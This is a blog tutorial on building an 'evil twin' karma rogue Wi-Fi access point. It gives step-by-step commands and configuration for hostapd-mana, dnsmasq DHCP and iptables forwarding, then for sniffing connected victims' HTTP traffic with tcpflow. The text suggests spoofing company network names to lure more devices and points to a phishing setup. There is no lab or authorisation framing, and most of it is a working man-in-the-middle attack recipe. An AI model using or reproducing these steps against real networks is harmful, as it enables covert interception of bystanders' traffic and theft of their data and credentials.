Fake AP: How to Create an Evil Twin Karma Access Point

by hash3liZer . 05 June 2019

Fake AP: How to Create an Evil Twin Karma Access Point

Karma refers to a set of patches and the modifications done in order to get our wireless access point respond to every single one of the probe request frames. These are the wireless packets sent by devices like mobile phones and laptops in order to find the available Access Points.

Devices usually seek to connect known access points if they are found in range. And how it detects an Access Point is by sending and receiving probe frames.

Here, in this scenario a karma is employed so that our rogue/fake access point could respond to all of the probe request frames regardless of the requested access point. Further, the task can be more surfaced by sending some of the usually named access point like a company name to draw in more traffic quickly.

karma

However, some devices go for the encryption offered by the AP before associating with them. Some would likely to auto-connect while some will drop the connection quickly after the encryption gets mismatched.

Hostapd-Mana:

Hostapd Mana is an updated version of the orignal hostapd with much more functionality to base a perfect Rogue Access Point. We could use this toolkit for a number of recon purposes like logging the probe activity, and setup a karma attack.

STEP 1

Installation

If you happen to be running Kali or Parrot, you can directly install the mana-toolkit using the package manager:

$ apt update
$ apt install mana-toolkit dnsmasq

Make sure you install dnsmasq even if you are not installing mana-toolkit from the package manager.

If that's not the case, or you want to grab it directly from the sources, you could follow the instructions for the normal hostapd. Install the dependencies and compile the source from github:

$ apt install build-essential libssl-dev libnl-genl-3-dev
$ git clone https://github.com/sensepost/hostapd-mana
$ cd hostapd-mana/
$ make -C hostapd
$ make install

After installation, you will have the hostapd & hostapd_cli binaries under:

/usr/lib/mana-toolkit/hostapd
/usr/lib/mana-toolkit/hostapd_cli

And you could verify the installation by checking the script version:

$ /usr/lib/mana-toolkit/hostapd -v

hostapd mana

Finally, make the link for both binaries to our execution directory. So, that we won't have to travel through directories each time to acess our tool:

$ ln -s /usr/lib/mana-toolkit/hostapd /usr/bin/mana-hostapd
$ ln -s /usr/lib/mana-toolkit/hostapd_cli /usr/bin/mana_hostapd_cli

STEP 2

Evil Twin Karma AP

Let's host our Evil Twin Access Point. Since Mana is an extended version of the orignal hostapd, we could base our simple configuration here as well. Let's stretch the config for the evil twin:

$ nano hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name] 
hw_mode=g
channel=[Fake AP Channel]

enable_mana=1

The line enable_mana is what activates the karma attack. This is the default karma mode in which when the presence of an access point is requested globally, the device who requested that AP will receive a frame from the evil twin indicating that he is the access point the device is looking for.

The other mode is regarded as loud mode. Here upon a broadcast probe request frame, every device will receive a probe response frame from the evil twin. This could flood the network list with non-existent access points. However, if you are still eager for the loud mode, you can add this line:

mana_loud=1

Note the args:

  • interface: Monitor Mode interface for hosting the fake access point.
  • ssid: Name of Rogue Access Point
  • channel: Channel for Rogue Access Point.
  • enable_mana: Enable mana mode, also enables karma mode.
  • mana_loud: Enable mana loud mode. Will send probe response frames to all devices.

Finally, launch the Fake Access Point:

$ mana-hostapd hostapd.conf 

mana hostapd working

STEP 3

Evil Twin DHCP

Next, we need the DHCP server to wrap our access point with a network. This is what allows the devices to connect & communicate each other. Now, prepare a simple configuration file for dnsmasq:

$ nano dnsmasq.conf
interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Fire up DHCP:

$ dnsmasq -C dnsmasq.conf -d

dnsmasq

And don't forget to execute these two commands. It will setup the required network along with the ip for our monitor interface wlan1mon.

$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

STEP 4

Internet Access

To perform an extensive MITM attack, let's setup the internet connection. To provide the Evil Twin users with internet facility, we need another wired or wireless interface connected to Internet.

Supposing, we have a connection at wlan0, forward the internet traffic from this interface to the monitor interface:

$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

Note the highlighted parameters:

  • --out-interface: interface from where to forward traffic.
  • --in-interface: Interface to which traffic is being forwarded

Finally, allow traffic forwarding rules:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

STEP 5

Sniffing (MITM)

I am not diving deep into how to setup a phishing site with evil twin here. You can have a read for this here in this tutorial:

Setup Fake (Rogue) Access Point on Linux | hostapd

For MITM, we have a couple of choices. Let's fire tcpflow to capture the data being flowed in the network. We can capture traffic with a couple of factors in consideration. One thing, the traffic through port 443 would be encoded and we can't directly decode it. So, a website using HTTPS is likely to be protected from MITM.

$ tcpflow -i any -C -g port 80

tcpflow

Note the args:

  • -i: interface to listen on.
  • port: specific port to listen to. Multiple ports can be specified by using ",".

STEP 6

Probe Capture with Wireshark

We have done all of our configuration here. However, we must verify it whether our attack vector was successful or not. For this we would have to analyze the wireless traffic. Fire up wireshark and add the below filter to the filter bar:

wlan.fc.subtype eq 5

It will only display probe response frames. If you see probe response frames from the evil twin address with a different ESSID than we have chosen in the hostapd configuration, it means that the evil twin karma access point is successfuly setup.

wireshark capturing probe response frames.

Conclusion

We can draw in more devices to our access point by forging mainstream beaconprobe response frames. While this task could be quite complicated if tried to done through manual configuration. Hostapd-mana brings us an extensive updated interface of hostapd which can be used for a number of purposes.